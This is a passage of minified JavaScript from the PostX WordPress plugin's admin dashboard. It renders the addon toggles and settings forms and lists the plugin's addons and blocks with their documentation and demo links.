web-share",allowFullScreen:!0}))},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_right_banner.jpg",className:"ultp-banner-img"}),(0,a.createElement)("div",{className:"ultp-play-icon-container"},(0,a.createElement)("img",{className:"ultp-play-icon",src:ultp_dashboard_pannel.url+"/assets/img/dashboard/play.png",alt:__("Play","ultimate-post")}),(0,a.createElement)("span",{className:"ultp-animate"}))),(0,a.createElement)("div",{className:"ultp-dashboard-content"},ultp_dashboard_pannel.active?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-title _pro"},__("What Do You Need?","ultimate-post")),(0,a.createElement)("div",{className:"ultp-description _pro"},__("Do you have something in mind you want to share? Both we and our users would like to hear about it. Share your ideas on our Facebook group and let us know what you need.","ultimate-post")),(0,l.ac)("https://www.facebook.com/groups/gutenbergpostx","","Share Ideas","")):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-title"},__("Do More with","ultimate-post")," ",(0,a.createElement)("span",{style:{color:"var(--postx-primary-color)"}},__("PRO:","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-description"},__("Unlock powerful customizations with PostX Pro:","ultimate-post")),(0,a.createElement)("div",{className:"ultp-lists"},B.map(((e,t)=>(0,a.createElement)("span",{className:"ultp-list",key:t},o.Z.rightMark," ",e)))),(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/?utm_source=db-postx-started&utm_medium=upgrade-pro-hero&utm_campaign=postx-dashboard#pricing",className:"ultp-upgrade-btn",target:"_blank",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),o.Z.rocketPro))))),f&&(0,l.cs)({tags:"addons_popup",func:e=>{h(e)},data:{icon:"addon_lock.svg",title:__("Unlock All Addons of PostX","ultimate-post"),description:__("Sorry, this addon is not available in the free version of PostX. Please upgrade to a pro plan to unlock all pro addons and features of PostX.","ultimate-post")}}),(0,a.createElement)("div",{className:"ultp-addons-container-grid"},(0,a.createElement)("div",{className:"ultp-addons-items"},H.map((t=>(0,a.createElement)("div",{key:t.value,className:"ultp-addon-group"},(0,a.createElement)("div",{className:"ultp_h2 ultp-addon-parent-heading"},t.label),Object.keys(g).length>0?((e=!1)=>(0,a.createElement)("div",{className:"ultp-addons-grid "+(e?"":"ultp-gs")},Object.keys(S).map(((t,r)=>{const o=S[t];if(e&&!o.integration||!e&&o.integration)return;let s=!0;return s=!("true"!=g[t]&&1!=g[t]||o.is_pro&&!ultp_dashboard_pannel.active),(0,a.createElement)("div",{className:"ultp-addon-item",key:t},(0,a.createElement)("div",{className:"ultp-addon-item-contents",style:{paddingBottom:o.notice?"10px":"auto"}},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)("img",{src:`${ultp_dashboard_pannel.url}assets/img/addons/${o.img}`,alt:o.name}),(0,a.createElement)("div",{className:"ultp_h6 ultp-addon-item-title"},o.name,o?.new&&(0,a.createElement)("span",{className:"ultp-new-tag"},"New")),(0,a.createElement)("div",{className:"ultp-dash-control-options ultp-ml-auto"},(0,a.createElement)("input",{type:"checkbox",datatype:t,className:"ultp-addons-enable "+(o.is_pro&&!ultp_dashboard_pannel.active?"disabled":""),id:t,checked:s,onChange:()=>{(e=>{const t="true"==g[e]?"false":"true";!ultp_dashboard_pannel.active&&S[e].is_pro?(v({...g,[e]:"false"}),h(!0)):(v({...g,[e]:t}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:e,value:t}}).then((n=>{n.success&&(["ultp_templates","ultp_custom_font","ultp_builder"].includes(e)&&(document.getElementById("postx-submenu-"+e.replace("templates","saved_templates").replace("ultp_","").replace("_","-")).style.display="true"==t?"block":"none",document.getElementById(e.replace("templates","saved_templates").replace("ultp_","ultp-dasnav-").replace("_","-")).style.display="true"==t?"":"none"),setTimeout((function(){x({status:"success",messages:[n.message],state:!0})}),400))})))})(t)}}),(0,a.createElement)("label",{htmlFor:t,className:"ultp-control__label"},o.is_pro&&!ultp_dashboard_pannel.active&&(0,a.createElement)("span",{className:"dashicons dashicons-lock"})))),(0,a.createElement)("div",{className:"ultp-description"},o.desc,o.notice&&(0,a.createElement)("div",{className:"ultp-description-notice"},o.notice)),o.required&&o.required?.name&&(0,a.createElement)("span",{className:"ultp-plugin-required"}," ",__("This addon required this plugin:","ultimate-post"),o.required.name),o.is_pro&&!ultp_dashboard_pannel.active&&(0,a.createElement)("div",{onClick:()=>{h(!0)},className:"ultp-pro-lock"},(0,a.createElement)("span",null,"PRO"))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)("div",{className:"ultp-docs-action"},o.live&&(0,a.createElement)("a",{href:o.live.replace("live_demo_args",`?utm_source=${e?"db-postx-integration":"db-postx-addons"}&utm_medium=${e?"":t+"-"}demo&utm_campaign=postx-dashboard`),className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.desktop,__("Demo","ultimate-post")),o.docs&&(0,a.createElement)("a",{href:o.docs+(e?"?utm_source=db-postx-integration":"?utm_source=db-postx-addons")+"&utm_medium=docs&utm_campaign=postx-dashboard",className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.media_document,__("Docs","ultimate-post")),o.video&&(0,a.createElement)("a",{href:o.video,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.rightAngle,__("Video","ultimate-post")),M[t]&&(0,a.createElement)("div",{className:"ultp-popup-setting",onClick:()=>{m(t)}},i.ZP.setting),n==t&&(0,a.createElement)("div",{className:"ultp-addon-settings"},(0,a.createElement)("div",{className:"ultp-addon-settings-popup"},M[t]&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-addon-settings-title"},(0,a.createElement)("div",{className:"ultp_h6"},o.name,": ",__("Settings","ultimate-post"))),(0,a.createElement)("form",{onSubmit:z,action:""},(0,a.createElement)("div",{className:"ultp-addon-settings-body"},"ultp_frontend_submission"===t&&(0,a.createElement)(u.Z,{attr:M[t].attr,settings:g,setSettings:v}),"ultp_frontend_submission"!=t&&(0,l.DC)(M[t].attr,g),(0,a.createElement)("div",{className:"ultp-data-message"})),(0,a.createElement)("div",{className:"ultp-addon-settings-footer"},(0,a.createElement)("button",{type:"submit",className:"cursor ultp-primary-button "+(E?"onloading":"")},__("Save Settings","ultimate-post"),E&&i.ZP.refresh))),(0,a.createElement)("button",{onClick:()=>{m("")},className:"ultp-popup-close"})))))))}))))(!!t.integration):(0,a.createElement)("div",{className:"ultp-addons-grid "+(e?"":"ultp-gs")},Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-addon-item"},(0,a.createElement)("div",{className:"ultp-addon-item-contents"},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:50,unit2:"px",br:18}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:28,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-description"},(0,a.createElement)(p.Z,{type:"custom_size",classes:"loop",c_s:{size1:100,unit1:"%",size2:14,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",classes:"loop",c_s:{size1:70,unit1:"%",size2:14,unit2:"px",br:2}}))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:8}}),(0,a.createElement)("div",{className:"ultp-docs-action"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}))))))),!e&&(0,a.createElement)("div",{className:"ultp_dash_key_features"},(0,a.createElement)("div",{className:"ultp_h2"},__("Key Features of PostX","ultimate-post")),(0,a.createElement)("div",{className:"ultp_dash_key_features_content"},N?.map(((e,t)=>(0,a.createElement)("div",{key:t},(0,a.createElement)("div",{className:"ultp_dash_key_features_label"},e.label),(0,a.createElement)("div",{className:"ultp-description"},e.descp)))))))))),e&&(0,a.createElement)(l.gR,{FRBtnTag:"settingsFR",proBtnTags:"postx_dashboard_settings"}))),b.state&&(0,a.createElement)(c.Z,{delay:2e3,toastMessages:b,setToastMessages:x}),y&&(0,a.createElement)(s.Z,{title:__("Postx Intro","ultimate-post"),modalContent:y,setModalContent:k}))}},6731:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(4190),o=n(4766);const{__}=wp.i18n,i=({attr:e,settings:t,setSettings:n})=>{const i=e,l=({multikey:e,value:r,multiValue:i})=>{var l;const[s,p]=(0,a.useState)([...i]),[c,d]=(0,a.useState)(!1),[u,m]=(0,a.useState)(null!==(l=r.options)&&void 0!==l?l:{}),[f,h]=(0,a.useState)(""),g=e=>{e.target.closest(".ultp-ms-container")||d(!1)};return(0,a.useEffect)((()=>(document.addEventListener("mousedown",g),()=>document.removeEventListener("mousedown",g))),[]),(0,a.useEffect)((()=>{setTimeout((()=>{const e=Object.fromEntries(Object.entries(r.options).filter((([e,t])=>t.toLowerCase().includes(f.toLowerCase())||e.toLowerCase().includes(f.toLowerCase()))));m(e)}),500)}),[f]),(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"hidden",name:e,value:s,"data-customprop":"custom_multiselect"}),(0,a.createElement)("div",{className:"ultp-ms-container"},(0,a.createElement)("div",{onClick:()=>d(!c),className:"ultp-ms-results-con cursor"},(0,a.createElement)("div",{className:"ultp-ms-results"},s.length>0?s?.map(((i,l)=>(0,a.createElement)("span",{key:l,className:"ultp-ms-selected"},r.options[i],(0,a.createElement)("span",{className:"ultp-ms-remove cursor",onClick:a=>{a.stopPropagation(),(a=>{const r=s.filter((e=>e!=a));p(r),n({...t,[e]:r})})(i)}},o.ZP.close_circle_line)))):(0,a.createElement)("span",null,__("Select options"))),(0,a.createElement)("span",{onClick:()=>d(!c),className:"ultp-ms-results-collapse cursor"},o.ZP.collapse_bottom_line)),c&&u&&(0,a.createElement)("div",{className:"ultp-ms-options"},(0,a.createElement)("input",{type:"text",className:"ultp-multiselect-search",value:f,onChange:e=>h(e.target.value)}),Object.keys(u)?.map(((o,i)=>(0,a.createElement)("span",{className:"ultp-ms-option cursor",onClick:()=>(a=>{let o=[];if(-1==s.indexOf(a)&&"all"!=a&&(o=[...s,a]),"all"===a){const e=Object.fromEntries(Object.entries(r.options).filter((([e,t])=>!t.toLowerCase().includes("all"))));o=Object.keys(e)}p(o),n({...t,[e]:o})})(o),key:i,value:o},u[o]))))))};return(0,a.createElement)(a.Fragment,null,Object.keys(i).map(((e,o)=>{const s=i[e];return(0,a.createElement)("span",{key:o},"hidden"==s.type&&(0,a.createElement)("input",{key:e,type:"hidden",name:e,defaultValue:s.value}),"hidden"!=s.type&&(0,a.createElement)(a.Fragment,null,"heading"==s.type&&(0,a.createElement)("h2",{className:"ultp-settings-heading"},s.label)&&(0,a.createElement)(a.Fragment,null,s.desc&&(0,a.createElement)("div",{className:"ultp-settings-subheading"},s.desc)),"heading"!=s.type&&((e,n)=>{let a=!0;return n.hasOwnProperty("depends_on")&&n.depends_on.forEach((e=>{"=="==e.condition&&t[e.key]!=e.value&&(a=!1)})),a})(0,s)&&(0,a.createElement)("div",{className:"ultp-settings-wrap"},s.label&&(0,a.createElement)("strong",null,s.label,s.tooltip&&(0,a.createElement)(r.Z,{placement:"bottom",content:s.tooltip},(0,a.createElement)("span",{className:" cursor dashicons dashicons-editor-help"}))),(0,a.createElement)("div",{className:"ultp-settings-field-wrap"},((e,r,o)=>{const i=t.hasOwnProperty(e)?t[e]:t.default?t.default:"multiselect"==r.type?[]:"",s=e=>{n((t=>"checkbox"===e.target.type?{...t,[e.target.name]:e.target.checked?"yes":"no"}:{...t,[e.target.name]:e.target.value}))};switch(r.type){case"select":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("select",{defaultValue:i,name:e,id:e,onChange:s},Object.keys(r.options).map(((e,t)=>(0,a.createElement)("option",{key:t,value:e},r.options[e])))),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"radio":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("div",{className:"ultp-field-radio"},(0,a.createElement)("div",{className:"ultp-field-radio-items"},Object.keys(r.options).map(((t,n)=>(0,a.createElement)("div",{key:n,className:"ultp-field-radio-item"},(0,a.createElement)("input",{type:"radio",id:t,name:e,value:t,defaultChecked:t==i,onChange:s}),(0,a.createElement)("label",{htmlFor:t},r.options[t])))))),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"color":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"text",defaultValue:i,className:"ultp-color-picker"}),(0,a.createElement)("span",{className:"ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,className:"ultp-color-code",defaultValue:i})),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"number":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"number",name:e,defaultValue:i,onChange:s}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"switch":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{value:"yes",type:"checkbox",name:e,defaultChecked:"yes"==i||"on"==i,onChange:s}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"switchButton":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{type:"checkbox",value:"yes",name:e,defaultChecked:"yes"==i||"on"==i}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc),(0,a.createElement)("div",null,(0,a.createElement)("span",{id:"postx-regenerate-css",className:`ultp-upgrade-pro-btn cursor ${"yes"==i?"active":""} `},(0,a.createElement)("span",{className:"dashicons dashicons-admin-generic"}),(0,a.createElement)("span",{className:"ultp-text"},__("Re-Generate Font Files","ultimate-post")))));case"multiselect":const t=Array.isArray(i)?i:[i];return(0,a.createElement)(l,{multikey:e,value:r,multiValue:t});case"text":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,defaultValue:i,onChange:s}),(0,a.createElement)("span",{className:"ultp-description"},r.desc,r.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:r.link,rel:"noreferrer"},r.linkText)));case"textarea":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("textarea",{name:e,defaultValue:i}),(0,a.createElement)("span",{className:"ultp-description"},r.desc,r.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:r.link,rel:"noreferrer"},r.linkText)));case"shortcode":return(0,a.createElement)("code",{className:"ultp-shortcode-copy"},"[",r.value,"]")}})(e,s)))))})))}},1370:(e,t,n)=>{"use strict";n.d(t,{q:()=>a});const{__}=wp.i18n,a={ultp_wpbakery:{name:"WPBakery",desc:__("It lets you use PostX’s Gutenberg blocks in the WPBakery Builder by using the Saved Template Addon.","ultimate-post"),img:"wpbakery.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/wpbakery-page-builder-addon/",live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",video:"https://www.youtube.com/watch?v=f99NZ6N9uDQ",position:20,integration:!0},ultp_templates:{name:"Saved Templates",desc:__("Create unlimited templates by converting Gutenberg blocks into shortcodes to use them anywhere.","ultimate-post"),img:"saved-template.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/shortcodes-support/",live:"https://www.wpxpo.com/postx/addons/save-template/live_demo_args",video:"https://www.youtube.com/watch?v=6ydwiIp2Jkg",position:10},ultp_table_of_content:{name:"Table of Contents",desc:__("It enables a highly customizable block to the Gutenberg blocks library to display the Table of Contents.","ultimate-post"),img:"table-of-content.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/table-of-content/",live:"https://www.wpxpo.com/postx/addons/table-of-content/live_demo_args",video:"https://www.youtube.com/watch?v=xKu_E720MkE",position:25},ultp_oxygen:{name:"Oxygen",desc:__("It lets you use PostX’s Gutenberg blocks in the Oxygen Builder by using the Saved Template Addon.","ultimate-post"),img:"oxygen.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/oxygen-builder-addon/",live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",video:"https://www.youtube.com/watch?v=iGik4w3ZEuE",position:20,integration:!0},ultp_elementor:{name:"Elementor",desc:__("It lets you use PostX’s Gutenberg blocks in the Elementor Builder by using the Saved Template Addon.","ultimate-post"),img:"elementor-icon.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/elementor-addon/",video:"https://www.youtube.com/watch?v=GJEa2_Tow58",position:20,integration:!0},ultp_dynamic_content:{name:"Dynamic Content",desc:__("Insert dynamic, real-time content like excerpts, dates, author names, etc. in PostX blocks.","ultimate-post"),img:"dynamic-content.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/postx-features/dynamic-content/",live:"https://www.wpxpo.com/create-custom-fields-in-wordpress/live_demo_args",video:"https://www.youtube.com/watch?v=4oeXkHCRVCA",position:6,notice:"ACF, Meta Box and Pods (PRO)",new:!0},ultp_divi:{name:"Divi",desc:__("It lets you use PostX’s Gutenberg blocks in the Divi Builder by using the Saved Template Addon.","ultimate-post"),img:"divi.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/divi-addon/?utm_source=postx-menu&utm_medium=addons-demo&utm_campaign=postx-dashboard",video:"https://www.youtube.com/watch?v=p9RKTYzqU48",position:20,integration:!0},ultp_custom_font:{name:"Custom Font",desc:__("It allows you to upload custom fonts and use them on any PostX blocks with all typographical options.","ultimate-post"),img:"custom_font.svg",is_pro:!1,live:"https://www.wpxpo.com/wordpress-custom-fonts/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/custom-fonts/",video:"https://www.youtube.com/watch?v=tLqUpj_gL-U",position:7},ultp_bricks_builder:{name:"Bricks Builder",desc:__("It lets you use PostX’s Gutenberg blocks in the Bricks Builder by using the Saved Template Addon.","ultimate-post"),img:"bricks.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/bricks-builder-addon/",video:"https://www.youtube.com/watch?v=t0ae3TL48u0",position:20,integration:!0},ultp_beaver_builder:{name:"Beaver",desc:__("It lets you use PostX’s Gutenberg blocks in the Beaver Builder by using the Saved Template Addon.","ultimate-post"),img:"beaver.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/beaver-builder-addon/",video:"https://www.youtube.com/watch?v=aLfI0RkJO6g",position:20,integration:!0},ultp_frontend_submission:{name:"Front End Post Submission",desc:__("Registered/guest writers can submit posts from frontend. Admins can easily manage, review, and publish posts.","ultimate-post"),img:"frontend_submission.svg",docs:"https://wpxpo.com/docs/postx/add-on/front-end-post-submission/",live:"https://www.wpxpo.com/postx/front-end-post-submission/live_demo_args",video:"https://www.youtube.com/watch?v=KofF7BUwNC0",is_pro:!0,position:6,integration:!1},ultp_category:{name:"Taxonomy Image & Color",desc:__("It allows you to add category or taxonomy-specific featured images and colors to make them attractive.","ultimate-post"),is_pro:!0,docs:"https://wpxpo.com/docs/postx/add-on/category-addon/",live:"https://www.wpxpo.com/postx/taxonomy-image-and-color/live_demo_args",video:"https://www.youtube.com/watch?v=cd75q-lJIwg",img:"category-style.svg",position:15},ultp_progressbar:{name:"Progress Bar",desc:__("Display a visual indicator of the reading progression of blog posts and the scrolling progression of pages.","ultimate-post"),img:"progressbar.svg",docs:"https://wpxpo.com/docs/postx/add-on/progress-bar/",live:"https://www.wpxpo.com/postx/progress-bar/live_demo_args",video:"https://www.youtube.com/watch?v=QErQoDhWi4c",is_pro:!0,position:30},ultp_yoast:{name:"Yoast",desc:__("It allows you to display custom meta descriptions added with the Yoast SEO plugin instead of excerpts.","ultimate-post"),img:"yoast.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Yoast",slug:"wordpress-seo/wp-seo.php"},position:55,integration:!0},ultp_aioseo:{name:"All in One SEO",desc:__("It allows you to display custom meta descriptions added with the All in One SEO plugin instead of excerpts.","ultimate-post"),img:"aioseo.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"All in One SEO",slug:"all-in-one-seo-pack/all_in_one_seo_pack.php"},position:35,integration:!0},ultp_rankmath:{name:"Rank Math",desc:__("It allows you to display custom meta descriptions added with the Rank Math plugin instead of excerpts.","ultimate-post"),img:"rankmath.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Rank Math",slug:"seo-by-rank-math/rank-math.php"},position:40,integration:!0},ultp_seopress:{name:"SEOPress",desc:__("It allows you to display custom meta descriptions added with the SEOPress plugin instead of excerpts.","ultimate-post"),img:"seopress.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"SEOPress",slug:"wp-seopress/seopress.php"},position:45,integration:!0},ultp_squirrly:{name:"Squirrly",desc:__("It allows you to display custom meta descriptions added with the Squirrly plugin instead of excerpts.","ultimate-post"),img:"squirrly.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Squirrly",slug:"squirrly-seo/squirrly.php"},position:50,integration:!0},ultp_builder:{name:"Dynamic Site Builder",desc:__("The Gutenberg-based Builder allows users to create dynamic templates for Home and all Archive pages.","ultimate-post"),img:"builder-icon.svg",docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",live:"https://www.wpxpo.com/postx/gutenberg-site-builder/live_demo_args",video:"https://www.youtube.com/watch?v=0qQmnUqWcIg",is_pro:!1,position:5},ultp_chatgpt:{name:"ChatGPT",desc:__("PostX brings the ChatGPT into the WordPress Dashboard to let you generate content effortlessly.","ultimate-post"),img:"ChatGPT.svg",docs:"https://wpxpo.com/docs/postx/add-on/chatgpt-addon/",live:"https://www.wpxpo.com/postx-chatgpt-wordpress-ai-content-generator/live_demo_args",video:"https://www.youtube.com/watch?v=NE4BPw4OTAA",is_pro:!1,position:6}}},7191:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(1383),o=n(8949),i=n(356);n(563);const{__}=wp.i18n,l={grid:{label:__("Post Grid Blocks","ultimate-post"),attr:{post_grid_1:{label:__("Post Grid #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6829",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-1/",icon:"post-grid-1.svg"},post_grid_2:{label:__("Post Grid #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6830",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-2/",icon:"post-grid-2.svg"},post_grid_3:{label:__("Post Grid #3","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6831",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-3/",icon:"post-grid-3.svg"},post_grid_4:{label:__("Post Grid #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6832",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-4/",icon:"post-grid-4.svg"},post_grid_5:{label:__("Post Grid #5","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6833",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-5/",icon:"post-grid-5.svg"},post_grid_6:{label:__("Post Grid #6","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6834",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-6/",icon:"post-grid-6.svg"},post_grid_7:{label:__("Post Grid #7","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6835",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-7/",icon:"post-grid-7.svg"}}},list:{label:__("Post List Blocks","ultimate-post"),attr:{post_list_1:{label:__("Post List #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6836",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-1/",icon:"post-list-1.svg"},post_list_2:{label:__("Post List #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6837",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-2/",icon:"post-list-2.svg"},post_list_3:{label:__("Post List #3","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6838",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-3/",icon:"post-list-3.svg"},post_list_4:{label:__("Post List #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6839",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-4/",icon:"post-list-4.svg"}}},slider:{label:__("Post Slider Blocks","ultimate-post"),attr:{post_slider_1:{label:__("Post Slider #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6840",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-1/",icon:"post-slider-1.svg"},post_slider_2:{label:__("Post Slider #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7487",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-2/",icon:"post-slider-2.svg"}}},other:{label:__("Others PostX Blocks","ultimate-post"),attr:{menu:{label:__("Menu - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/introducing-postx-mega-menu/",docs:"https://wpxpo.com/docs/postx/postx-menu/",icon:"/menu/menu.svg"},post_module_1:{label:__("Post Module #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6825",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-1/",icon:"post-module-1.svg"},post_module_2:{label:__("Post Module #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6827",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-2/",icon:"post-module-2.svg"},heading:{label:__("Heading","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6842",docs:"https://wpxpo.com/docs/postx/all-blocks/heading-blocks/",icon:"heading.svg"},image:{label:__("Image","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6843",docs:"https://wpxpo.com/docs/postx/all-blocks/image-blocks/",icon:"image.svg"},taxonomy:{label:__("Taxonomy","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6841",docs:"https://wpxpo.com/docs/postx/all-blocks/taxonomy-1/",icon:"ultp-taxonomy.svg"},wrapper:{label:__("Wrapper","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6844",docs:"https://wpxpo.com/docs/postx/all-blocks/wrapper/",icon:"wrapper.svg"},news_ticker:{label:__("News Ticker","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6845",docs:"https://wpxpo.com/docs/postx/all-blocks/news-ticker-block/",icon:"news-ticker.svg"},advanced_list:{label:__("List - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7994",docs:"https://wpxpo.com/docs/postx/all-blocks/list-block/",icon:"advanced-list.svg"},button_group:{label:__("Button Group","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7952",docs:"https://wpxpo.com/docs/postx/all-blocks/button-block/",icon:"button-group.svg"},row:{label:__("Row","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx-row-column-block/",docs:"https://wpxpo.com/docs/postx/postx-features/row-column/",icon:"row.svg"},advanced_search:{label:__("Search - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},dark_light:{label:__("Dark Light","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},star_ratings:{label:__("Star 